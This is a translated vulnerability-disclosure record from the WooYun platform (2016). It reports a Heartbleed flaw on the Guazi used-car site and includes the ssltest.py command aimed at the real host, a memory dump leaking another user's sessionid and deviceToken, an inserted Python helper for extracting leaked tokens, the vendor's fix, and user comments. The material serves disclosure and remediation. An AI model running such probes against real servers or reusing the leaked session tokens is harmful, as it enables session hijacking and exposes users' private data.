Heartbleed vulnerability on the Guazi used-car (瓜子二手车) main site

ID: 219549
URL: http://www.wooyun.org/bug.php?action=view&id=219549
Status: fixed by vendor
Title: Heartbleed vulnerability on the Guazi used-car (瓜子二手车) main site
Type: improper system/service operations configuration
Vendor: 瓜子二手车直卖网 (Guazi)
White hat: 路人甲 (anonymous)
Submitted: 2016-06-15 17:08:00
Published: 2016-07-01 15:47:00
Fixed: 2016-07-01 15:47:00
Confirmed: 2016-06-16 00:00:00
Confirm Spend: 1
Tags: sensitive information disclosure
Followers: 0
Favorites: 0
White hat rating
White hat self-assessed rank: 10
Vendor rating
Vendor rank: 2
Summary
See title.
Details

python ssltest.py www.guazi.com  443


The heartbeat response leaks session information (an HTTP request from another client, including its sessionid cookie, is visible in the dump below).

Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 3891
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 42 41 04 7E 39 4F BD DD E6 33 2D 25 90 .@.BA.~9O...3-%.
0010: 9E 6F 6F AD 29 CC EE 75 E5 7B 6B 9A 50 8B 05 C5 .oo.)..u.{k.P...
0020: 1F 82 1D C5 CD 23 EE DB D6 76 3E 15 93 18 68 6C .....#...v>...hl
0030: 55 28 34 AA 5D 75 CB 54 89 4F 40 CE 0C B1 C3 86 U(4.]u.T.O@.....
0040: 6E 48 1C B6 15 DF 14 03 01 00 01 01 16 03 01 00 nH..............
0050: 30 14 00 00 0C 19 B0 7F 04 F9 D8 CE A0 52 1C 5D 0............R.]
0060: C8 CD B7 16 82 E7 CC 88 DC F7 06 45 99 31 B3 04 ...........E.1..
0070: FA 18 AC D9 FD 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B ................
0080: 0B 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 63 72 65 65 ....#.......cree
00e0: 6E 57 48 3D 31 34 34 30 58 32 35 36 30 26 64 65 nWH=1440X2560&de
00f0: 76 69 63 65 54 6F 6B 65 6E 3D 72 70 37 6C 6F 42 viceToken=rp7loB
0100: 51 6A 32 25 32 46 5A 4E 66 57 69 58 50 6A 32 47 Qj2%2FZNfWiXPj2G
0110: 75 56 4B 47 6C 45 35 70 6C 4C 76 78 50 33 30 33 uVKGlE5plLvxP303
0120: 7A 7A 4D 63 4D 37 6B 25 33 44 26 63 75 73 74 6F zzMcM7k%3D&custo
0130: 6D 65 72 49 64 3D 38 37 39 26 70 61 67 65 3D 31 merId=879&page=1
0140: 26 6D 6F 64 65 6C 3D 53 4D 2D 47 39 32 38 30 20 &model=SM-G9280
0150: 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 HTTP/1.1..Host:
0160: 61 70 69 2E 67 75 61 7A 69 2E 63 6F 6D 0D 0A 43 api.guazi.com..C

03b0: C8 1E 5F 8E 3D 76 BA 71 7E A8 22 74 89 06 8E 1B  .._.=v.q~."t....
03c0: 77 5B CE 3C 1C 9F 7B 04 AE 86 4D 01 DE 8E 79 F7 w[.<..{...M...y.
03d0: 86 84 17 37 23 F0 BF E6 AB 02 66 00 C2 5D A8 1A ...7#.....f..]..
03e0: 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F ................
03f0: 1A 04 EA 0A 86 82 95 4F DD 68 74 F9 50 C8 34 0F .......O.ht.P.4.
0400: 4B 42 5C B0 C1 D1 F5 B5 AF 41 92 61 65 74 61 3D KB\......A.aeta=
0410: 32 2E 30 3B 20 73 65 73 73 69 6F 6E 69 64 3D 66 2.0; sessionid=f
0420: 66 33 35 62 62 35 34 2D 62 37 62 35 2D 34 38 62 f35bb54-b7b5-48b
0430: 35 2D 66 30 62 31 2D 64 63 64 37 63 61 34 32 30 5-f0b1-dcd7ca420
0440: 63 66 62 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A cfb..Connection:
0450: 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 41 63 63 keep-alive..Acc
0460: 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A 68 ept-Language: zh
0470: 2D 48 61 6E 73 3B 71 3D 31 2C 20 65 6E 3B 71 3D -Hans;q=1, en;q=
0480: 30 2E 39 2C 20 66 72 3B 71 3D 30 2E 38 2C 20 64 0.9, fr;q=0.8, d
0490: 65 3B 71 3D 30 2E 37 2C 20 6A 61 3B 71 3D 30 2E e;q=0.7, ja;q=0.
04a0: 36 2C 20 6E 6C 3B 71 3D 30 2E 35 0D 0A 55 73 65 6, nl;q=0.5..Use
04b0: 72 2D 41 67 65 6E 74 3A 20 47 4A 45 72 43 61 72 r-Agent: GJErCar
04c0: 41 70 70 2F 32 2E 30 2E 30 20 28 69 50 68 6F 6E App/2.0.0 (iPhon
04d0: 65 3B 20 69 4F 53 20 37 2E 31 2E 31 3B 20 53 63 e; iOS 7.1.1; Sc
04e0: 61 6C 65 2F 32 2E 30 30 29 0D 0A 0D 0A 9C 17 1B ale/2.00).......
04f0: 6F 3E F9 EE 54 58 E5 87 50 50 C5 EC A4 5A F9 7F o>..TX..PP...Z..
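A triage helper for a dump like the one above, added here as an example (my code, not part of the report or of ssltest.py). It parses the hexdump lines, reads the 3-byte heartbeat header to confirm the over-read (type 2, claimed length 0x4000 = 16384 against a request that carried no payload bytes, which is an assumption about how ssltest.py builds its request), and pulls out the leaked session identifiers that a defender would need to revoke. The sample input is a constructed excerpt of five lines copied from the dump above.

```python
import re
from typing import Dict, Tuple

# Constructed excerpt: five lines copied from the ssltest.py dump above; the full
# response was 16384 bytes and offsets 0010-0400 are omitted here.
SAMPLE_DUMP = """\
0000: 02 40 00 42 41 04 7E 39 4F BD DD E6 33 2D 25 90 .@.BA.~9O...3-%.
0410: 32 2E 30 3B 20 73 65 73 73 69 6F 6E 69 64 3D 66 2.0; sessionid=f
0420: 66 33 35 62 62 35 34 2D 62 37 62 35 2D 34 38 62 f35bb54-b7b5-48b
0430: 35 2D 66 30 62 31 2D 64 63 64 37 63 61 34 32 30 5-f0b1-dcd7ca420
0440: 63 66 62 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A cfb..Connection:
"""

# "0410: 32 2E ..." -> 4-digit offset, then up to 16 hex bytes; the ASCII column is ignored.
LINE_RE = re.compile(r"^([0-9A-Fa-f]{4}):((?: [0-9A-Fa-f]{2}){1,16})")
# name=value pairs in the leaked request that identify a user and must be revoked.
TOKEN_RE = re.compile(r"(sessionid|deviceToken)=([^;&\s]+)")


def parse_dump(text: str) -> Dict[int, bytes]:
    """Map each dump line's offset to its raw bytes."""
    chunks: Dict[int, bytes] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            chunks[int(m.group(1), 16)] = bytes.fromhex(m.group(2).replace(" ", ""))
    return chunks


def joined(chunks: Dict[int, bytes]) -> bytes:
    """Concatenate in offset order; a NUL marks each gap so strings never fuse across it."""
    out, expect = b"", None
    for off in sorted(chunks):
        out += (b"" if off == expect else b"\x00") + chunks[off]
        expect = off + len(chunks[off])
    return out


def heartbeat_header(chunks: Dict[int, bytes]) -> Tuple[int, int]:
    """Bytes 0-2 of the response: message type (2 = heartbeat response), claimed length."""
    head = chunks[0]
    return head[0], int.from_bytes(head[1:3], "big")


def is_overread(chunks: Dict[int, bytes], payload_sent: int) -> bool:
    """Heartbleed signature: the server returns more payload than the client sent.
    Assumption: ssltest.py declares 0x4000 payload bytes but sends none, so pass 0."""
    hb_type, claimed = heartbeat_header(chunks)
    return hb_type == 2 and claimed > payload_sent


def leaked_tokens(chunks: Dict[int, bytes]) -> Dict[str, str]:
    """Session identifiers found in the leaked memory (latin-1 keeps every byte)."""
    return dict(TOKEN_RE.findall(joined(chunks).decode("latin-1")))
```

Run against the full dump, `leaked_tokens` is the list of sessions (and the deviceToken seen at offset 00f0) to invalidate once the SSL library is patched, since patching alone does not undo a leak that already happened.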

POC

瓜子2.png

瓜子1.png

Remediation

Update the SSL module (patch OpenSSL to a version that is not affected by Heartbleed).

Status history
2016-06-15: Details sent to the vendor, awaiting vendor response
2016-06-16: Vendor confirmed; details visible to the vendor only
2016-06-26: Details opened to core white hats and domain experts
2016-07-01: Vendor fixed the vulnerability and published proactively; details opened to the public
Vendor reply: Some machines did indeed have this problem, thanks for the submission!
Response: severity: low; vulnerability rank: 2; confirmed: 2016-06-16 11:40
Comments (content / commenter / likes / time)

Still, that's fine too; the vendor probably didn't see it last time, this time they should fix it properly.

大物期末不能挂 (0 likes) 2016-06-16 15:28:00

At the time I saw that almost all of their domains had Heartbleed, and I didn't dare spell it out.....

大物期末不能挂 (0 likes) 2016-06-16 15:25:00

@大物期末不能挂 Before submitting I skimmed the titles and didn't see any Heartbleed report, so I submitted it.

专业种田 (0 likes) 2016-06-16 13:31:00

WooYun: 瓜子二手车直卖网 improper operations configuration leads to information disclosure

大物期末不能挂 (0 likes) 2016-06-16 12:11:00